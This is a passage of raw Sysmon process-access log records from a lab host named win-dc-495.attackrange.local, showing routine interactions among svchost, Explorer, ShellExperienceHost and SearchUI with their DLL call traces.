RT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x800000000000000013158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-93FA-6005-FC04-00000000A301}37845672C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+38e70|C:\Windows\System32\wpncore.dll+23267|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x800000000000000013157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-93FA-6005-FC04-00000000A301}37845676C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+37bbe|C:\Windows\System32\wpncore.dll+232a3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x800000000000000013152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-93FA-6005-FC04-00000000A301}37845676C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+38e70|C:\Windows\System32\wpncore.dll+23267|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x800000000000000013151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.211{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000013205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.211{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000013204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.211{59A5CD1D-93FA-6005-FC04-00000000A301}37845228C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.211{59A5CD1D-93FA-6005-FC04-00000000A301}37845228C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 